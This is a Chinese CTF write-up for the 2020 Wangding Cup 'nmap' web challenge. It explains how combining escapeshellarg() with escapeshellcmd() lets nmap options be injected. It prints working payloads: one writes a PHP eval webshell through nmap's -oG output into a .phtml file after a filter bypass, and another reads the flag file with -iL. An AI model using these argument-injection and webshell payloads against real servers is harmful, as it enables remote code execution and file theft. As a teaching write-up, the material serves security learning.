当前位置:网站首页>2020网鼎杯_朱雀组_Web_nmap
2020网鼎杯_朱雀组_Web_nmap
2022-07-06 09:15:00 【Her&mes】
WP
两个考察点
1.考察nmap的使用
2.考察escapeshellarg()与escapeshellcmd()混合使用的漏洞
第一个还好说,题目告诉了
第二个点嘛,不知道,完全不知道是从哪里获取到的,自闭ing
看其他师傅的wp,提到了[BUUCTF 2018]Online Tool,一道代码审计题,直接告诉了参数经过escapeshellarg()与escapeshellcmd()处理
两道题考察的点不能说一样,只能说完全一致。
nmap要用输出相关的参数
在nmap中文网里查阅能有以下结果:
-oN (标准输出)
-oX (XML输出)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep输出)
-oA (输出至所有格式)
还有其他一些杂七杂八的输出,可以去看看,这里用-oG 构造payload
payload的主体是
<?php @eval($_POST["hack"]);?> -oG hack.php
然而发送后回显hacker字样
有过滤,进行fuzz测试,php被过滤了,但是phtml没有,并且用php的短标签能代替<?php,即有:
<?= @eval($_POST["hack"]);?> -oG hack.phtml
到这里还不行,这样的parload经过escapeshellarg()与escapeshellcmd()函数处理,没法产生文件
解决办法很简单,加空格和单引号就行,这样能产生可被正常解析的php文件
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
具体的原理看大佬写的PHP escapeshellarg()+escapeshellcmd() 之殇
在CSDN上还有其他师傅写的关于escapeshellarg()与escapeshellcmd()的分析,浅显易懂
除了写入webshell,还有直接读的方法,利用了-iL参数
' -iL ../../../../flag -o a '
直接访问a就行,下面也可以这样,不过要访问a’
' -iL ../../../../flag -o a
原因也是那两个函数。
边栏推荐
- 人脸识别 face_recognition
- Some notes of MySQL
- Use dapr to shorten software development cycle and improve production efficiency
- Attention apply personal understanding to images
- Why can't I use the @test annotation after introducing JUnit
- [NPUCTF2020]ReadlezPHP
- QT creator uses Valgrind code analysis tool
- ImportError: libmysqlclient. so. 20: Cannot open shared object file: no such file or directory solution
- 牛客Novice月赛40
- Number game
猜你喜欢
Kept VRRP script, preemptive delay, VIP unicast details
[number theory] divisor
MySQL与c语言连接(vs2019版)
Vs2019 desktop app quick start
学习问题1:127.0.0.1拒绝了我们的访问
Basic use of redis
Learning question 1:127.0.0.1 refused our visit
保姆级出题教程
Image recognition - pyteseract TesseractNotFoundError: tesseract is not installed or it‘s not in your path
基于apache-jena的知识问答
随机推荐
牛客Novice月赛40
Machine learning notes week02 convolutional neural network
AcWing 1298.曹冲养猪 题解
MySQL与c语言连接(vs2019版)
Test objects involved in safety test
Kept VRRP script, preemptive delay, VIP unicast details
QT creator specify editor settings
Windows下安装MongDB教程、Redis教程
Solution to the practice set of ladder race LV1 (all)
Nanny level problem setting tutorial
Basic use of redis
Request object and response object analysis
How to configure flymcu (STM32 serial port download software) is shown in super detail
QT creator support platform
安装numpy问题总结
一键提取pdf中的表格
报错解决 —— io.UnsupportedOperation: can‘t do nonzero end-relative seeks
天梯赛练习集题解LV1(all)
Image recognition - pyteseract TesseractNotFoundError: tesseract is not installed or it‘s not in your path
How to set up voice recognition on the computer with shortcut keys